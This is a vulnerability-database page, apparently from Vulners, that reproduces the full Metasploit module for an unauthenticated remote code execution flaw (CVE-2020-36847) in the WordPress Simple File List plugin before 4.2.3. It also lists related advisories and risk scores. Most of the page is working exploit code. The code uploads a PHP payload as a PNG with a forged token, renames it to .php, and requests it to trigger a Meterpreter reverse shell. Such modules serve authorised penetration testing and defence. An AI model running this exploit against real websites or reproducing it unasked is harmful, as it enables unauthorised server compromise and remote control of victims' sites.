Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Simple File List Unauthenticated Remote Code Execution

🗓️ 03 Dec 2020 17:41:25Reported by coiffeur, h00dieType 
metasploit
 metasploit🔗 www.rapid7.com👁 40 Views

WordPress Simple File List Unauthenticated Remote Code Execution module allows unauthenticated attackers to upload and execute arbitrary PHP code by exploiting a rename function in the plugin

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for CVE-2025-34085
22 Jul 202514:24
githubexploit
Circl		CVE-2020-36847
3 Dec 202016:03
circl
CNNVD		WordPress plugin Simple-File-List 代码问题漏洞
12 Jul 202500:00
cnnvd
CVE		CVE-2020-36847
12 Jul 202509:24
cve
Cvelist		CVE-2020-36847 Simple File List < 4.2.3 - Remote Code Execution
12 Jul 202509:24
cvelist
Exploit DB		Simple File List WordPress Plugin 4.2.2 - File Upload to RCE
22 Jul 202500:00
exploitdb
EUVD		EUVD-2020-30797
7 Oct 202500:30
euvd
NVD		CVE-2020-36847
12 Jul 202510:15
nvd
Packet Storm		📄 WordPress Simple File List 4.2.2 Shell Upload
22 Jul 202500:00
packetstorm
Positive Technologies		PT-2025-29315 · WordPress · Simple-File-List Plugin
12 Jul 202500:00
ptsecurity
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Simple File List Unauthenticated Remote Code Execution',
        'Description' => %q{
          Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers
          to upload files within a controlled list of extensions.  However, the rename function does not conform to
          the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed
          to php and executed.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'coiffeur', # initial discovery and PoC
          'h00die', # msf module
        ],
        'References' => [
          [ 'CVE', '2020-36847' ],
          [ 'WPVDB', '10192' ],
          [ 'URL', 'https://www.cybersecurity-help.cz/vdb/SB2020042711' ],
          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list' ],
          [ 'EDB', '48349' ]
        ],
        'Platform' => [ 'php' ],
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' => [
          [
            'Default',
            {
              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DisclosureDate' => '2020-04-27',
        'DefaultTarget' => 0,
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
      ]
    )
  end

  def dir_path
    '/wp-content/uploads/simple-file-list/'
  end

  def upload_path
    '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
  end

  def move_path
    '/wp-content/plugins/simple-file-list/ee-file-engine.php'
  end

  def upload(filename)
    print_status('Attempting to upload the PHP payload as a PNG file')
    now = Date.today.to_time.to_i.to_s
    data = Rex::MIME::Message.new
    data.add_part('1', nil, nil, 'form-data; name="eeSFL_ID"')
    data.add_part(dir_path, nil, nil, 'form-data; name="eeSFL_FileUploadDir"')
    data.add_part(now, nil, nil, 'form-data; name="eeSFL_Timestamp"')
    data.add_part(Digest::MD5.hexdigest("unique_salt#{now}"), nil, nil, 'form-data; name="eeSFL_Token"')
    data.add_part("#{payload.encoded}\n", 'image/png', nil, "form-data; name=\"file\"; filename=\"#{filename}.png\"")

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, upload_path),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
    # the server will respond with a 200, but if the timestamp and token dont match it wont give back SUCCESS as it failed
    fail_with(Failure::UnexpectedReply, "#{peer} - File failed to upload") unless res.body.include?('SUCCESS')

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.png"),
      'method' => 'GET'
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
    # 404 could be AV got it or something similar
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}.  File was uploaded successfully, but could not be found.") if res.code == 404
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200

    print_good('PNG payload successfully uploaded')
  end

  def rename(filename)
    print_status("Attempting to rename #{filename}.png to #{filename}.php")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, move_path),
      'method' => 'POST',
      'vars_post' => {
        'eeSFL_ID' => 1,
        'eeFileOld' => "#{filename}.png",
        'eeListFolder' => '/',
        'eeFileAction' => "Rename|#{filename}.php"
      }
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200

    print_good("Successfully renamed #{filename}.png to #{filename}.php")
  end

  def check
    return CheckCode::Unknown unless wordpress_and_online?

    # check the plugin version from readme
    check_plugin_version_from_readme('simple-file-list', '4.2.3', '1.0.1')
  end

  def exploit
    # filename of the file to be uploaded/created
    filename = Rex::Text.rand_text_alphanumeric(8)
    register_file_for_cleanup("#{filename}.php")

    upload(filename)
    rename(filename)
    print_status('Triggering shell')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.php"),
      'method' => 'GET'
    )
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Jan 2026 18:57Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
EPSS0.89304
SSVC
wordpressunauthenticatedremote code execution
40